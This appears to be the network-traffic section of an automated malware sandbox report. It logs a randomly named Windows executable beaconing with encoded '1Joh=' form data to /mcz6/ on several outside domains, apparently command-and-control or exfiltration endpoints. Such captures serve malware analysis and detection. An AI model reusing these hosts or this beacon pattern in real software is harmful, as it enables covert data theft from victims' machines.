                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 7a 4a 6f 79 5a 69 55 4d 4f 48 70 42 70 61 4a 66 6f 59 59 37 61 6d 6a 59 4b 52 62 6e 4d 4d 64 53 33 54 48 75 46 33 41 36 44 7a 30 67 55 45 53 49 53 4b 42 75 56 43 30 77 55 4d 59 68 6b 38 50 56 45 7a 73 50 73 37 6a 67 59 52 6f 74 37 4b 73 67 2f 70 51 68 33 64 72 58 41 78 39 6e 42 77 52 71 4c 67 53 51 34 36 4f 6d 4b 75 52 2f 43 58 69 33 52 47 2f 5a 76 35 39 50 33 37 34 62 57 72 61 77 36 4d 48 77 34 48 71 47 33 75 77 38 42 4b 32 71 2f 44 65 77 56 69 6b 4e 54 45 7a 61 79 46 44 6f 71 58 7a 69 4c 6d 49 4f 72 6e 49 6b 4b 42 6f 4f 69 57 50 67 4f 68 4c 67 6d 63 4f 37 4d 6b 75 4c 69 4b 67 5a 4b 4f 6e 4c 69 72 52 75 48 71 34 2f 49 36 41 2f 49 38 6c 65 48 68 77 71 64 6d 66 52 72 64 46 46 4b 68 6e 4d 4a 44 57 6a 55 35 54 56 32 2f 59 63 76 47 74 35 58 53 41 46 71 74 6c 6f 62 47 54 78 59 30 61 56 6a 63 61 55 64 49 67 43 6a 4c 6b 6b 4d 4d 66 4f 4f 68 36 4c 6f 51 52 5a 59 46 35 45 58 50 6c 62 54 31 43 4e 54 76 4e 73 75 50 70 53 62 6f 31 69 43 4a 30 49 77 46 61 47 54 30 48 68 34 2f 74 4c 34 4b 5a 45 56 [TRUNCATED]
                                                     Data Ascii: 1Joh= [TRUNCATED]


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     20 | 192.168.2.9 | 49734 | 91.195.240.123 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:10.669912100 CEST | 476 bytes | OUT | GET /mcz6/?1Joh=+LASaW8sLlti/Y5moa0QLjD+NRT0ctxfunbDEh0FE1w8Tz+VHrtWZSUefKogmen1MiEzwZmsfiIE4qB4y6Vq9cD+KipKFAhgCA6j04PZFMUkTXmsCQ==&-xl=hBllB6kp4D1dBFK HTTP/1.1
                                                    Host: www.walletweb367.top
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     21 | 192.168.2.9 | 49735 | 162.0.237.22 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:26.161324024 CEST | 732 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 35 42 36 45 77 7a 70 41 74 63 4d 79 61 2f 43 39 4c 4b 2f 44 71 42 50 30 64 69 4a 37 33 71 46 65 4e 70 51 49 53 31 65 7a 55 76 4c 69 42 67 51 6b 30 70 61 77 6b 71 34 4c 53 74 39 6f 43 6a 49 30 72 64 4b 50 52 42 46 53 69 4e 4a 59 69 5a 6e 4d 2b 39 48 76 56 2f 62 5a 62 66 6b 65 47 56 43 44 61 64 53 6d 52 4e 2b 75 32 62 52 53 57 56 46 61 4b 4c 6f 79 2f 53 67 59 79 70 4a 42 6e 68 4b 45 38 56 34 4a 73 6c 38 35 4c 4d 48 59 68 76 53 61 65 6d 63 69 77 4f 50 4e 47 50 5a 52 54 51 62 57 57 74 6f 32 47 78 74 4d 61 78 76 4b 4e 30 37 32
                                                    Data Ascii: 1Joh=U51Zs5j/nfea5B6EwzpAtcMya/C9LK/DqBP0diJ73qFeNpQIS1ezUvLiBgQk0pawkq4LSt9oCjI0rdKPRBFSiNJYiZnM+9HvV/bZbfkeGVCDadSmRN+u2bRSWVFaKLoy/SgYypJBnhKE8V4Jsl85LMHYhvSaemciwOPNGPZRTQbWWto2GxtMaxvKN072


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     22 | 192.168.2.9 | 49736 | 162.0.237.22 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:28.696790934 CEST | 756 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 78 65 44 74 63 49 52 30 65 7a 54 76 4c 69 55 51 51 74 70 35 61 4e 6b 71 38 70 53 76 70 6f 43 67 30 30 72 64 36 50 57 32 52 54 6a 64 4a 61 2b 5a 6e 4b 68 4e 48 76 56 2f 62 5a 62 65 42 37 47 56 4b 44 62 74 43 6d 65 4d 2b 74 70 72 52 52 41 46 46 61 42 72 6f 32 2f 53 68 50 79 6f 56 6e 6e 6a 79 45 38 55 49 4a 76 30 38 34 51 38 48 6b 73 50 54 76 52 6e 42 61 2f 63 65 5a 4f 66 35 52 4c 54 7a 64 63 73 49 6f 58 44 6b 58 50 6d 76 74 4b 54 79 65 52 47 36 59 49 49 67 53 6e 69 51 77 30 7a 38 6e 32 31 6f 44 4e 41 3d 3d
                                                    Data Ascii: 1Joh=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIxeDtcIR0ezTvLiUQQtp5aNkq8pSvpoCg00rd6PW2RTjdJa+ZnKhNHvV/bZbeB7GVKDbtCmeM+tprRRAFFaBro2/ShPyoVnnjyE8UIJv084Q8HksPTvRnBa/ceZOf5RLTzdcsIoXDkXPmvtKTyeRG6YIIgSniQw0z8n21oDNA==
                                                     May 16, 2024 17:20:30.030138969 CEST | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:29 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     23 | 192.168.2.9 | 49737 | 162.0.237.22 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:31.231916904 CEST | 1769 bytes | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.deaybrid.info
                                                    Referer: http://www.deaybrid.info/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Raw: 31 4a 6f 68 3d 55 35 31 5a 73 35 6a 2f 6e 66 65 61 34 69 69 45 31 52 42 41 72 38 4d 31 44 2f 43 39 53 61 2f 48 71 42 54 30 64 6a 4d 2b 69 49 4a 65 44 65 55 49 57 6e 32 7a 53 76 4c 69 56 51 51 6f 70 35 61 63 6b 71 45 74 53 76 6c 53 43 6c 77 30 72 2b 79 50 54 48 52 54 73 64 4a 61 6d 5a 6e 50 2b 39 47 6c 56 2f 4c 64 62 66 78 37 47 56 4b 44 62 6f 47 6d 61 64 2b 74 36 37 52 53 57 56 46 47 4b 4c 6f 61 2f 53 35 66 79 70 67 61 6d 51 36 45 38 30 59 4a 75 47 55 34 63 38 48 63 69 76 54 33 52 6e 4e 46 2f 63 44 67 4f 66 39 37 4c 54 62 64 51 71 31 2b 44 33 77 4f 59 45 2f 65 4b 67 62 35 4a 53 32 69 42 37 4a 48 6d 44 49 6b 68 58 70 47 79 32 4d 48 50 6a 49 61 6d 57 2b 44 6f 70 2f 49 70 6b 64 2f 49 57 41 42 73 34 4c 71 61 32 2f 75 6b 57 30 45 42 7a 68 62 32 58 38 51 56 56 67 76 50 6e 39 46 33 55 6c 55 5a 6c 67 37 34 48 33 47 7a 7a 4f 4f 49 75 32 75 31 79 6f 4f 6d 57 51 38 2b 44 62 31 47 41 4b 42 54 4d 6b 36 30 63 53 53 76 37 48 76 71 49 73 36 48 67 73 66 43 4f 70 34 39 72 6d 5a 6b 72 66 6e 6a 76 73 61 59 6a 47 46 2b [TRUNCATED]
                                                    Data Ascii: 1Joh=U51Zs5j/nfea4iiE1RBAr8M1D/C9Sa/HqBT0djM+iIJeDeUIWn2zSvLiVQQop5ackqEtSvlSClw0r+yPTHRTsdJamZnP+9GlV/Ldbfx7GVKDboGmad+t67RSWVFGKLoa/S5fypgamQ6E80YJuGU4c8HcivT3RnNF/cDgOf97LTbdQq1+D3wOYE/eKgb5JS2iB7JHmDIkhXpGy2MHPjIamW+Dop/Ipkd/IWABs4Lqa2/ukW0EBzhb2X8QVVgvPn9F3UlUZlg74H3GzzOOIu2u1yoOmWQ8+Db1GAKBTMk60cSSv7HvqIs6HgsfCOp49rmZkrfnjvsaYjGF+CIc9GVbPLNZfgngg9ljKQG0UDc48pphxsnPTT0KbV1D3BgQgmeXFcO4IpZ3GryNgE7/3UIDkrPCTZbOBDdugcKyxXphQ7IcQLQXy9C13xusX3yaBkc974u4K2+aiIHuxNhNxStXay7lhOnexdLy247EiBKY0sTJ26uvOwq0B02i77jkB9f2+pxkDRzN/sznPjwitxgvYsoIO88tL98hpxiRDHA8405kc1e8vZS21VSElyk3TWxoQcdIAzoF/PSsdjI2M2EIMHEUB0wW0A7F9yS0dTq9uLkECppLqMfpPmu9stRufDEXxzNVtQ12v7vna+8ICAKbAsG3jt6/k1DnlgV6V/p8bLydtJpd+hOYiLvSYBIq+xGZLmMRdq5xuI+CVft0fomE+fUbfE7YaLahi+suYsdPW8GvGjTSUn5qW263q5fOKRMj1iH4bt3SBmsoGvJr4D3KEeMD/ItMTh6OXLyI26RE2Mhj26Rp2mkabU9ON5HEd7UuRvCtl9X+BR6iPP7t3Aeo2LDWJKnRjhTpn6HYGw0p31GRzusCLQsOp8Wq4uq9Rl2s466SHwAKBNfWuLNZmIMuSXo05sNgHBNQqpc1+rGyECJMyBXVemKrdC6tR32FF3ubDcqNqLmWKCCdurmi5Jl9nwgP0HHG7bitSiaHLus43w1Ex85 [TRUNCATED]
                                                     May 16, 2024 17:20:32.106977940 CEST | 533 bytes | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:31 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                     24 | 192.168.2.9 | 49738 | 162.0.237.22 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                     Timestamp | Bytes transferred | Direction | Data
                                                     May 16, 2024 17:20:33.776360035 CEST | 473 bytes | OUT | GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=Z7d5vO3PiPWE/zeG4Btin5s4Ysi+TbPypBLuOElxuuV1BOUgEEq9TvThZhsN+4G3m8UtXtkpFAILmOKtc08UqI4ilaLC+vP+XuzsWsJjJ3qBfbOqHA== HTTP/1.1
                                                    Host: www.deaybrid.info
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                     May 16, 2024 17:20:34.576129913 CEST | 548 bytes | IN | HTTP/1.1 404 Not Found
                                                    Date: Thu, 16 May 2024 15:20:34 GMT
                                                    Server: Apache
                                                    Content-Length: 389
                                                    Connection: close
                                                    Content-Type: text/html; charset=utf-8
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    25 | 192.168.2.9 | 49739 | 103.168.172.37 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:04.300153971 CEST | 750 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 193
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWcubrR4vdO2fa8NbKNGYspmBzkPrdDY8hbE0HVhZ7S0ZNCmxn/L4H4U5i7v7dkQN5vqoVwJ+VoGRTfswWzy0yJzaXH7zNWXoz6+1sc2unlTBR3E+rzanql2mVPgAaIdG4PhrXAL13mnx5V+mARvvBPggshM9d6wmCJgrg79aF3sO35RpC
                                                    May 16, 2024 17:21:05.327138901 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:05 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_159389ade035d0ad7fc69ce6881f36b4
                                                    Content-Encoding: br


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    26 | 192.168.2.9 | 49740 | 103.168.172.37 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:06.836740017 CEST | 774 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 217
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW7IhYgwHUgZ7R0ZNNGxi7L4M4UEV7uHdkQZ5vrYVx6GSuWRRTMwY9S0yJzaXH7moWXgz6uFsOUGkmTBWjU+r3anul2m3PjE8IbC4PhbXO614vnx7Kun8cuvFUApw8utdjmq/KBL+qPTei7OQ+2gqmf5KCLS/OlqrahINkQst3A==
                                                    May 16, 2024 17:21:07.658236027 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:07 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_c73188c602a93f2d446cefd441e22c7b
                                                    Content-Encoding: br


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    27 | 192.168.2.9 | 49741 | 103.168.172.37 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:09.369940042 CEST | 1787 | OUT | POST /mcz6/ HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Accept-Encoding: gzip, deflate, br
                                                    Origin: http://www.celebration24.co.uk
                                                    Referer: http://www.celebration24.co.uk/mcz6/
                                                    Connection: close
                                                    Content-Length: 1229
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    Data Ascii: 1Joh=bOU4KtZ1M2hWfNTrTbHdZmeo5NbKaWYopmdzkKLNW6whbT4HVDB7Q0ZNEmxj7L4d4UcR7uKmkSh5vNEV2LGSnWRRbswZzy0nJzqbH72oWXgz6sNsY2ukgTBR3E+dzanCl2vAPgoKIIK4PF3XCod4knx9Lunkcr2bUAkJ8vZ3jhG/AGygvub05rLn3UUxv59rDYvwRVmIDgJSnR5ZrlT0vChBbbYJe4xCrjn1HQsGq/9SGc54TlS7NV6n3LbrDiwbo2WH5MiUw3C1opit3plMRxG5XcPrtUmEreLE/GKTd1z4BpeD4CcZa4DiqlSxGM72Vv7I4dTZX7I5ye5FqS5igM8anF86lonQFMayTYEIql7fxacja9o9eCWrqzpArSV1h30h478EGWcgesRHLOsWqYqEnoQ0wXnn0b73TTbqAkzYiJ0AhMm7dhTh02ZeMvdyEHjwEcNnWhKM/orzFPJrDWQSPl7lW4yKKd+9Tw6t9oQ61rmNktx0Eow9s7GEh1b/3O/AVsGAxyfOocaTZi68n1Bzbp80mpqHkiknCKETqFQcf7dlbUxgN5k4kdGL2A8MiOofPpkt7y1CBuPgwSMwGjPl6SjfQLGuV74exoZTMdG8TO1PZgE0gu5MltKPNoYOxN8PCVAMrO455KrE9TjpHUJWT+3YUZYAEvz4vnido8mFkmiNMQncbx+ClbVICpPmAoHYP+qK1WDXvnYF88cwZR2JC+UeUJwhHqgT8SoQU0HgSnbFe+UwDCXJgw1rTDP+cKwXMoHiekT3xkKuMQ7H+bZtJlkcrIrHOJBXwRuQrB/iH40bgQExZahuD8fBVpYyrHPBu4FX38cQDyesRq8KrksCc5NdqcvMLUHYaYY27Xm62kAPi0Qp6uCKMIuFF/FOslpsbETCeflRLLO5a/rogv9D/fxtnDoVl+MOaur5CVlMa+QHgS0dXfzv8en6q/ObM/+vHERM4sRNrZwc5O4/y+eHXheSuo2Oy18NqvKrPT+3gnV [TRUNCATED]
                                                    May 16, 2024 17:21:10.088704109 CEST | 570 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:09 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_58458f13e6035bc12306a06a351c87b4
                                                    Content-Encoding: br


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    28 | 192.168.2.9 | 49742 | 103.168.172.37 | 80 | 1016 | C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    May 16, 2024 17:21:12.951994896 CEST | 479 | OUT | GET /mcz6/?-xl=hBllB6kp4D1dBFK&1Joh=WM8YJa5qA0NkIP/QQImrOwC+xPjRZGMWxn5RlfXsP+w6QT8BWCtnYGsQFWxr+5Q3wXsj3+rXjilTrq1L87WNvDgoePcC7Qc9BGKrDLvXVkg0rvhMMA== HTTP/1.1
                                                    Host: www.celebration24.co.uk
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Accept-Language: en-US,en;q=0.9
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
                                                    May 16, 2024 17:21:14.693639040 CEST | 796 | IN | HTTP/1.1 404 Not Found
                                                    Server: nginx
                                                    Date: Thu, 16 May 2024 15:21:14 GMT
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Content-Length: 544
                                                    Connection: close
                                                    x-backend: web4
                                                    X-Frontend: frontend1
                                                    X-Trace-Id: ti_90d904d2c1f6786a7c2c3ed3ae7772dd
                                                    Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
